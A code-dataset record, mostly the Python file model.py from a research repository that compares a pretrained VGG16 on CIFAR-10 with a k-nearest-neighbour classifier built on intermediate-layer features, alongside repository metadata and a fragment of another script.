df = pd.DataFrame(Hat_curr, columns=['A', 'B'])
df.to_csv(fn_csv, index=False)
odir = os.path.dirname(fn_csv)
df_test_X = pd.DataFrame(Test_X)
df_test_X.to_csv('{}/testx.csv'.format(odir), index=False)
df_test_Y = pd.DataFrame(Test_Y)
df_test_Y.to_csv('{}/testy.csv'.format(odir), index=False)
if Test_T is not None:
df_test_T = pd.DataFrame(Test_T)
fn_test1 = '{}/testt.csv'.format(odir)
df_test_T.to_csv(fn_test1, index=False)
| [
"e.s.saveliev@gmail.com"
] | e.s.saveliev@gmail.com |
d630ba6ec649a45b657654e4a48867ba1978b41e | df9fb16c1209a69c1191c2a936a264e84174c238 | /model.py | c30958f4ee15d3a2a5c235dfe46ae25d72b1805f | [] | no_license | twistedcubic/knn_vgg | 3bdb022b5495941c799417d5f5c87f562512bcb8 | d7507c76e60f6cdb1f4ece72bf683ae8e415a904 | refs/heads/master | 2020-05-05T14:06:15.342093 | 2018-11-07T18:34:36 | 2018-11-07T18:34:36 | 180,107,274 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,138 | py |
import torch
#import torchvision.models as models
import torch.nn.functional as F
import torchvision.datasets as datasets
import torchvision.transforms as transforms
from vgg import VGG
import torch.nn as nn
from collections import OrderedDict
import os
import time
BATCH_SZ = 128
use_gpu = True
normalize_feat = True
if use_gpu:
device = 'cuda' if torch.cuda.is_available() else 'cpu'
else:
device = 'cpu'
'''
Replace last part of VGG with knn, compare results
'''
def vgg_knn_compare(model, val_loader, feat_precomp, class_precomp, k=5, normalize_feat=False, num_layers=None):
#load data
#val_loader = get_loader()
#model=models.vgg16(pretrained=True)
#evaluate in batches
model.eval()
vgg_cor = 0
knn_cor = 0
total = len(val_loader.dataset)
for i, (input, target) in enumerate(val_loader):
#x_vgg = vgg16(*data)
#x_knn = feat_extract(vgg16, *data)
input, target = input.to(device), target.to(device)
#compare the models
with torch.no_grad():
vgg_cor += vgg_correct(model, input, target)
knn_cor += knn_correct(model, k, input, target, feat_precomp, class_precomp, normalize_feat=normalize_feat, num_layers=num_layers)
#print('corr {} {}'.format(vgg_cor, knn_cor))
del input, target
vgg_acc = vgg_cor/total
knn_acc = knn_cor/total
print('Peeling off {} layers -- vgg_cor: {} knn_cor: {} total: {}'.format(num_layers, vgg_cor, knn_cor, total))
print('knn_acc: {}'.format(knn_acc))
return vgg_acc, knn_acc
'''
Input:
-x, img data, in batches
'''
def vgg_correct(model, input, target):
#for i, (input, target) in enumerate(dataloader):
output = model(input)
_, output = output.max(1)
#print('vgg correct , output {} {}'.format(output, target))
correct = output.eq(target).sum(0)
return correct
'''
Applies model to get features, find nearest amongst feature2img.
Input:
-x, img data, in batches.
'''
def knn_correct(model, k, input, targets, feat_precomp, class_precomp, normalize_feat=False, num_layers=None):
model = peel_layers(model, num_layers)
#print('peeled_model {}'.format(model))
embs = model(input)
embs = embs.view(embs.size(0), embs.size(1))
#embs = feat_extract(model, input, num_layers=num_layers)
#print('embs size {}'.format(embs.size()))
correct = 0
dist_func_name = 'l2'
#if dist_func_name == 'l2':
dist_func = nn.PairwiseDistance()
#can run matmul on entire batch instead of one!
#find nearest for each
for i, emb in enumerate(embs):
#feat_precomp shape (batch_sz, 512), emb shape (512)
if dist_func_name == 'l2':
dist = dist_func(emb.unsqueeze(0), feat_precomp)
else:
if normalize_feat:
emb = F.normalize(emb, p=2, dim=0)
dist = torch.matmul(emb.unsqueeze(0), feat_precomp.t()).view(feat_precomp.size(0))
#print('dist {}'.format(dist.size()))
val, idx = torch.topk(dist, k, largest=(False if dist_func_name=='l2' else True))
target = targets[i]
#get classes of the imgs at idx
pred_classes = class_precomp[idx]
#print('idx target {} {}'.format(idx, pred_classes))
if target in pred_classes: ####
correct += 1
return correct
'''
Extract features from trained model using input data.
Inputs:
-model: Pytorch pretrained model.
-x: img data, in batch
-num_layers: num_layers to peel
Returns:
-embedding of input data
'''
def feat_extract(model, x, num_layers=None):
model.eval()
#right now replace the classifier part with kNN
#shape (batch_sz, 512, 1, 1)
if peel_layers != None:
cur_model = peel_layers(model, num_layers)
else:
if use_gpu:
cur_model = model.module.features
else:
cur_model = model.features
#print('peeled model: {}'.format(cur_model))
x = cur_model(x)
'''
if use_gpu:
x = model.module.features(x)
#x = cur_model(x)
else:
x = model.features(x)
'''
#print('x size {}'.format(x.size()))
x = x.view(x.size(0), x.size(1))
#print('x size {}'.format(x.size()))
return x
'''
Utilities functions to create feature data points on input images
for kNN
'''
'''
Returns embeddings of imgs in dataset, as lists of data and embeddings.
Input:
-knn: vgg model
'''
def create_embed(model, dataloader, normalize_feat=True, num_layers=None):
model.eval()
embs = None
#conserves memory
stream = False
targets = torch.LongTensor(len(dataloader.dataset)).to(device)
#datalist = []
file_counter = 0
counter = 0
batch_sz = 0
for i, (input, target) in enumerate(dataloader):
#input and target have sizes e.g. torch.Size([256, 3, 32, 32]) torch.Size([256])
#print('input tgt sizes {} {}'.format(input.size(), target.size()))
input, target = input.to(device), target.to(device)
#size (batch_sz, 512)
with torch.no_grad():
feat = feat_extract(model, input, num_layers=num_layers)
if not stream:
if embs is None:
batch_sz = target.size(0)
embs = torch.FloatTensor(len(dataloader.dataset), feat.size(1)).to(device)
embs[counter:counter+feat.size(0), :] = feat
targets[counter:counter+feat.size(0)] = target
counter += batch_sz
elif stream:
embs = torch.FloatTensor(feat.size(0), feat.size(1))
torch.save(embs, 'data/train_embs{}.pth'.format(file_counter))
torch.save(target, 'data/train_classes{}.pth'.format(file_counter))
file_counter += 1
del input, target, feat
#print('{} feat sz {}'.format(embs.size(), feat.size()))
if normalize_feat:
embs = F.normalize(embs, p=2, dim=1)
return embs, targets
transforms_train = [
transforms.RandomCrop(32, padding=4),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
]
transforms_test = [
transforms.ToTensor(),
transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),
]
'''
Create dataloader
'''
def get_loader(train=False):
if train:
transf = transforms_train
else:
transf = transforms_test
#use cifar10 built-in dataset
data_loader = torch.utils.data.DataLoader(
datasets.CIFAR10(root='data', train=train,
transform=transforms.Compose(
transf
), download=True
),
batch_size=BATCH_SZ, shuffle=False
)
return data_loader
'''
Create module with given number of blocks. Used for training after layers are
peeled off.
Input:
-model to use
-num_layers, number of layers in the vgg Sequential component to peel off. Should be multiples of 3 for each block, then plus 1
note the final avg pool layer should always be included in the end. Count max pool layer within the peeled off layers.
'''
def peel_layers(model, num_layers):
if num_layers is None:
if use_gpu:
return model.module.features
else:
return model.features
#modules have name .features, which is a Sequential, within which certain blocks are picked.
# 'VGG16': [64, 64, 'M', 128, 128, 'M', 256, 256, 256, 'M', 512, 512, 512, 'M', 512, 512, 512, 'M']
#model._modules is OrderedDict
if use_gpu:
model_layers = model._modules['module']._modules['features']._modules
else:
model_layers = model._modules['features']._modules
total_layers = len(model_layers) - num_layers
final_layers = []
#OrderedDict order guaranteed
for i, (name, layer) in enumerate(model_layers.items()):
if i == total_layers:
break
final_layers.append(layer)
if num_layers > 11:
final_layers.append(nn.MaxPool2d(kernel_size=2, stride=2))
if num_layers > 21:
final_layers.append(nn.MaxPool2d(kernel_size=2, stride=2))
#append MaxPool2d(kernel_size=2, stride=2, padding=0, dilation=1, ceil_mode=False), does not include params
#append AvgPool2d(kernel_size=1, stride=1, padding=0), which does not have params, so no need to copy
final_layers.extend([nn.MaxPool2d(kernel_size=2, stride=2, padding=0, dilation=1, ceil_mode=False) , nn.AvgPool2d(kernel_size=1, stride=1)])
return nn.Sequential(*final_layers)
'''
path: path to check point
'''
def get_model(path='pretrained/ckpt.t7'):
#model = nn.DataParallel(VGG('VGG16'))
model = VGG('VGG16')
#if True:
# print(model._modules['features']._modules)
#checkpoint=torch.load(path, map_location='cpu')
#checkpoint=torch.load(path, map_location=lambda storage, loc:storage)
#model was trained on GPU
state_dict = torch.load(path)['net']
if False:
print(state_dict.keys())
if False:
print(list(model._modules.keys()))
if use_gpu:
print(model._modules['module']._modules['features']._modules)
else:
print(model._modules['features']._modules)
if use_gpu:
model = nn.DataParallel(VGG('VGG16'))
else:
model = VGG('VGG16')
new_dict = OrderedDict()
for key, val in state_dict.items():
key = key[7:] #since 'module.' has len 7
new_dict[key] = val.to('cpu')
state_dict = new_dict
if False:
print(state_dict.keys())
model.load_state_dict(state_dict)
return model
'''
Load features for given number of layers peeled off.
'''
def load_features(num_layers):
embs_path = 'data/train_embs_norm{}.pth'.format(num_layers)
targets_path = 'data/train_classes_norm{}.pth'.format(num_layers)
if os.path.isfile(embs_path) and os.path.isfile(targets_path):
embs = torch.load(embs_path)
targets = torch.load(targets_path)
else:
raise Exception('Files don\'t exist {}, {}'.format(embs_path, targets_path))
return embs, targets
'''
Input:
-num_layers: number of layers to peel
'''
def run_and_compare(num_layers=None):
print('num_layers to peel: {}'.format(num_layers))
model = get_model()
model.eval()
if normalize_feat:
embs_path = 'data/train_embs_norm{}.pth'.format(num_layers)
targets_path = 'data/train_classes_norm{}.pth'.format(num_layers)
else:
embs_path = 'data/train_embs.pth'
targets_path = 'data/train_classes.pth'
#set to False for fast testing.
training=True
train_loader = get_loader(train=training)
if os.path.isfile(embs_path) and os.path.isfile(targets_path):
embs = torch.load(embs_path)
targets = torch.load(targets_path)
else:
#compute feat embed for training data. (total_len, 512)
embs, targets = create_embed(model, train_loader, normalize_feat=normalize_feat, num_layers=num_layers)
#should save as two-element dict
torch.save(embs, embs_path)
torch.save(targets, targets_path)
print('Done creating or loading embeddings for knn!')
val_loader = get_loader(train=False)
print('train dataset size {} test dataset size {}'.format(len(train_loader.dataset), len(val_loader.dataset) ))
vgg_acc, knn_acc = vgg_knn_compare(model, val_loader, embs, targets, k=1, normalize_feat=normalize_feat, num_layers=num_layers)
if __name__ == '__main__':
# train_loader = get_loader(train=True)
#should be in multiples of 3, then plus 2, and plus however many M is there
allowed_peel = [5, 8, 11, 15, 18, 21, 25, 28] #from 21 on, 256 dim instead of 512
#number of layers to peel
num_layers_l = [15, 18, 21, 25, 28]#, 15, 18, 22, 25, 28]
for num_layers in num_layers_l:
run_and_compare(num_layers=num_layers)
| [
"yihdong@microsoft.com"
] | yihdong@microsoft.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.